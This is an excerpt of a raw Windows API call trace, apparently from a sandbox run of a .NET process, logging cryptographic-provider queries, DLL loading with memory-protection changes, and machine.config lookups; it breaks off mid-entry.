[0135.606] GetCurrentProcess () returned 0xffffffff [0135.606] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e2c0*=0x77711860, NumberOfBytesToProtect=0x8f6e2c4, NewAccessProtection=0x20, OldAccessProtection=0x8f6e2f8 | out: BaseAddress=0x8f6e2c0*=0x77711000, NumberOfBytesToProtect=0x8f6e2c4, OldAccessProtection=0x8f6e2f8*=0x4) returned 0x0 [0135.606] SetLastError (dwErrCode=0x0) [0135.607] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContext") returned 0x0 [0135.607] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0135.608] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0135.608] CryptAcquireContextW (in: phProv=0x8f6ef1c, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8f6ef1c*=0xb1e9d8) returned 1 [0135.614] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetProvParam") returned 0x77753218 [0135.614] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.615] GetProcAddress (hModule=0x75230000, lpProcName="CryptGetProvParam") returned 0x75235d6a [0135.616] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.616] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x1 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.618] CoTaskMemFree (pv=0xbdea10) [0135.618] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.618] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.618] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.618] CoTaskMemFree (pv=0xbdea10) [0135.618] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.618] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.618] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.618] CoTaskMemFree (pv=0xbdea10) [0135.618] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.618] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.618] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.618] CoTaskMemFree (pv=0xbdea10) [0135.618] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.619] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.619] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.619] CoTaskMemFree (pv=0xbdea10) [0135.619] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.619] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.619] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.619] CoTaskMemFree (pv=0xbdea10) [0135.619] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.619] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.619] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.619] CoTaskMemFree (pv=0xbdea10) [0135.619] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.619] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.619] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.619] CoTaskMemFree (pv=0xbdea10) [0135.619] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.619] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.619] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.619] CoTaskMemFree (pv=0xbdea10) [0135.620] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.620] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.620] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.620] CoTaskMemFree (pv=0xbdea10) [0135.620] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.620] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.620] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.620] CoTaskMemFree (pv=0xbdea10) [0135.620] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.620] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.620] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.620] CoTaskMemFree (pv=0xbdea10) [0135.620] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.620] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.620] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.620] CoTaskMemFree (pv=0xbdea10) [0135.620] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.620] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.620] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.621] CoTaskMemFree (pv=0xbdea10) [0135.621] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.621] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.621] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.621] CoTaskMemFree (pv=0xbdea10) [0135.621] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.621] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.621] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.621] CoTaskMemFree (pv=0xbdea10) [0135.621] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.621] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.621] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.621] CoTaskMemFree (pv=0xbdea10) [0135.621] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.621] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.621] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.621] CoTaskMemFree (pv=0xbdea10) [0135.621] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.622] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.622] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.622] CoTaskMemFree (pv=0xbdea10) [0135.622] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 1 [0135.622] CoTaskMemAlloc (cb=0x20) returned 0xbdea10 [0135.622] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0xbdea10, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0xbdea10, pdwDataLen=0x8f6eee0) returned 1 [0135.622] CoTaskMemFree (pv=0xbdea10) [0135.622] CryptGetProvParam (in: hProv=0xb1e9d8, dwParam=0x1, pbData=0x0, pdwDataLen=0x8f6eee0, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x8f6eee0) returned 0 [0135.749] SysReAllocStringLen (in: pbstr=0x8f6e1f4*=0x0, psz="advapi32.dll", len=0xc | out: pbstr=0x8f6e1f4*="advapi32.dll") returned 1 [0135.750] CharLowerBuffW (in: lpsz="advapi32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0135.750] LoadLibraryExW (lpLibFileName="advapi32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0135.750] GetLastError () returned 0x0 [0135.750] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0135.750] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0135.750] GetModuleFileNameA (in: hModule=0x77710000, lpFilename=0x8f6e0d8, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0135.751] GetCurrentProcess () returned 0xffffffff [0135.751] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x77711520, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x4, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x20) returned 0x0 [0135.751] GetCurrentProcess () returned 0xffffffff [0135.751] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x77711520, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x20, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x4) returned 0x0 [0135.751] GetCurrentProcess () returned 0xffffffff [0135.751] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x77711540, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x4, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x20) returned 0x0 [0135.752] GetCurrentProcess () returned 0xffffffff [0135.752] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x77711540, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x20, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x4) returned 0x0 [0135.752] GetCurrentProcess () returned 0xffffffff [0135.752] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x7771175c, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x4, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x20) returned 0x0 [0135.752] GetCurrentProcess () returned 0xffffffff [0135.752] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x7771175c, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x20, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x4) returned 0x0 [0135.752] GetCurrentProcess () returned 0xffffffff [0135.752] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x77711768, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x4, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x20) returned 0x0 [0135.753] GetCurrentProcess () returned 0xffffffff [0135.753] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x77711768, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x20, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x4) returned 0x0 [0135.753] GetCurrentProcess () returned 0xffffffff [0135.753] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x777117b8, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x4, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x20) returned 0x0 [0135.753] GetCurrentProcess () returned 0xffffffff [0135.753] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x777117b8, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x20, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x4) returned 0x0 [0135.754] GetCurrentProcess () returned 0xffffffff [0135.754] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x777117bc, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x4, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x20) returned 0x0 [0135.754] GetCurrentProcess () returned 0xffffffff [0135.754] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x777117bc, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x20, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x4) returned 0x0 [0135.754] GetCurrentProcess () returned 0xffffffff [0135.754] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x777117c8, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x4, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x20) returned 0x0 [0135.754] GetCurrentProcess () returned 0xffffffff [0135.754] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x777117c8, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x20, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x4) returned 0x0 [0135.755] GetCurrentProcess () returned 0xffffffff [0135.755] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x777117d0, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x4, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x20) returned 0x0 [0135.755] GetCurrentProcess () returned 0xffffffff [0135.755] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x777117d0, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x20, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x4) returned 0x0 [0135.755] GetCurrentProcess () returned 0xffffffff [0135.755] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x7771180c, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x4, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x20) returned 0x0 [0135.756] GetCurrentProcess () returned 0xffffffff [0135.756] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x7771180c, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x20, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x4) returned 0x0 [0135.756] GetCurrentProcess () returned 0xffffffff [0135.756] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x7771182c, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x4, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x20) returned 0x0 [0135.756] GetCurrentProcess () returned 0xffffffff [0135.756] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x7771182c, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x20, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x4) returned 0x0 [0135.757] GetCurrentProcess () returned 0xffffffff [0135.757] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x77711860, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x4, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x20) returned 0x0 [0135.757] GetCurrentProcess () returned 0xffffffff [0135.757] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e1dc*=0x77711860, NumberOfBytesToProtect=0x8f6e1e0, NewAccessProtection=0x20, OldAccessProtection=0x8f6e214 | out: BaseAddress=0x8f6e1dc*=0x77711000, NumberOfBytesToProtect=0x8f6e1e0, OldAccessProtection=0x8f6e214*=0x4) returned 0x0 [0135.757] SetLastError (dwErrCode=0x0) [0135.757] GetProcAddress (hModule=0x77710000, lpProcName="ConvertSidToStringSidW") returned 0x77724344 [0135.758] GetCurrentThreadId () returned 0x6fc [0135.758] ResetEvent (hEvent=0xb8) returned 1 [0135.758] GetCurrentThreadId () returned 0x6fc [0135.758] GetCurrentThreadId () returned 0x6fc [0135.758] GetCurrentThreadId () returned 0x6fc [0135.758] ResetEvent (hEvent=0xb8) returned 1 [0135.758] GetCurrentThreadId () returned 0x6fc [0135.758] GetCurrentThreadId () returned 0x6fc [0135.758] SetEvent (hEvent=0xbc) returned 1 [0135.758] SetEvent (hEvent=0xb8) returned 1 [0135.758] CloseHandle (hObject=0x538) returned 1 [0135.759] SysReAllocStringLen (in: pbstr=0x8f6e228*=0x0, psz="shell32.dll", len=0xb | out: pbstr=0x8f6e228*="shell32.dll") returned 1 [0135.759] CharLowerBuffW (in: lpsz="shell32.dll", cchLength=0xb | out: lpsz="shell32.dll") returned 0xb [0135.759] LoadLibraryExW (lpLibFileName="shell32.dll", hFile=0x0, dwFlags=0x0) returned 0x759d0000 [0135.759] GetLastError () returned 0x0 [0135.759] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0135.759] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0135.760] GetModuleFileNameA (in: hModule=0x759d0000, lpFilename=0x8f6e10c, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll")) returned 0x1f [0135.760] GetCurrentProcess () returned 0xffffffff [0135.760] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e210*=0x759d13b4, NumberOfBytesToProtect=0x8f6e214, NewAccessProtection=0x4, OldAccessProtection=0x8f6e248 | out: BaseAddress=0x8f6e210*=0x759d1000, NumberOfBytesToProtect=0x8f6e214, OldAccessProtection=0x8f6e248*=0x20) returned 0x0 [0135.761] GetCurrentProcess () returned 0xffffffff [0135.761] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e210*=0x759d13b4, NumberOfBytesToProtect=0x8f6e214, NewAccessProtection=0x20, OldAccessProtection=0x8f6e248 | out: BaseAddress=0x8f6e210*=0x759d1000, NumberOfBytesToProtect=0x8f6e214, OldAccessProtection=0x8f6e248*=0x4) returned 0x0 [0135.761] GetCurrentProcess () returned 0xffffffff [0135.761] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e210*=0x759d13c4, NumberOfBytesToProtect=0x8f6e214, NewAccessProtection=0x4, OldAccessProtection=0x8f6e248 | out: BaseAddress=0x8f6e210*=0x759d1000, NumberOfBytesToProtect=0x8f6e214, OldAccessProtection=0x8f6e248*=0x20) returned 0x0 [0135.762] GetCurrentProcess () returned 0xffffffff [0135.762] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e210*=0x759d13c4, NumberOfBytesToProtect=0x8f6e214, NewAccessProtection=0x20, OldAccessProtection=0x8f6e248 | out: BaseAddress=0x8f6e210*=0x759d1000, NumberOfBytesToProtect=0x8f6e214, OldAccessProtection=0x8f6e248*=0x4) returned 0x0 [0135.762] GetCurrentProcess () returned 0xffffffff [0135.762] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e210*=0x759d21c0, NumberOfBytesToProtect=0x8f6e214, NewAccessProtection=0x4, OldAccessProtection=0x8f6e248 | out: BaseAddress=0x8f6e210*=0x759d2000, NumberOfBytesToProtect=0x8f6e214, OldAccessProtection=0x8f6e248*=0x20) returned 0x0 [0135.763] GetCurrentProcess () returned 0xffffffff [0135.763] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e210*=0x759d21c0, NumberOfBytesToProtect=0x8f6e214, NewAccessProtection=0x20, OldAccessProtection=0x8f6e248 | out: BaseAddress=0x8f6e210*=0x759d2000, NumberOfBytesToProtect=0x8f6e214, OldAccessProtection=0x8f6e248*=0x4) returned 0x0 [0135.763] GetCurrentProcess () returned 0xffffffff [0135.763] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e210*=0x759d224c, NumberOfBytesToProtect=0x8f6e214, NewAccessProtection=0x4, OldAccessProtection=0x8f6e248 | out: BaseAddress=0x8f6e210*=0x759d2000, NumberOfBytesToProtect=0x8f6e214, OldAccessProtection=0x8f6e248*=0x20) returned 0x0 [0135.763] GetCurrentProcess () returned 0xffffffff [0135.763] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x8f6e210*=0x759d224c, NumberOfBytesToProtect=0x8f6e214, NewAccessProtection=0x20, OldAccessProtection=0x8f6e248 | out: BaseAddress=0x8f6e210*=0x759d2000, NumberOfBytesToProtect=0x8f6e214, OldAccessProtection=0x8f6e248*=0x4) returned 0x0 [0135.764] SetLastError (dwErrCode=0x0) [0135.764] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0135.768] GetCurrentThreadId () returned 0x6fc [0135.768] ResetEvent (hEvent=0xb8) returned 1 [0135.768] GetCurrentThreadId () returned 0x6fc [0135.768] GetCurrentThreadId () returned 0x6fc [0135.768] GetCurrentThreadId () returned 0x6fc [0135.768] GetCurrentThreadId () returned 0x6fc [0135.768] ResetEvent (hEvent=0xb8) returned 1 [0135.768] GetCurrentThreadId () returned 0x6fc [0135.768] GetCurrentThreadId () returned 0x6fc [0135.768] SetEvent (hEvent=0xbc) returned 1 [0135.768] SetEvent (hEvent=0xb8) returned 1 [0135.768] CloseHandle (hObject=0x578) returned 1 [0135.901] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x8f6e8d8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0135.902] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", nBufferLength=0x105, lpBuffer=0x8f6e93c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config", lpFilePart=0x0) returned 0x43 [0135.902] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8f6ed9c) returned 1 [0135.902] GetFileAttributesExW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\config\\machine.config" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\config\\machine.config"), fInfoLevelId=0x0, 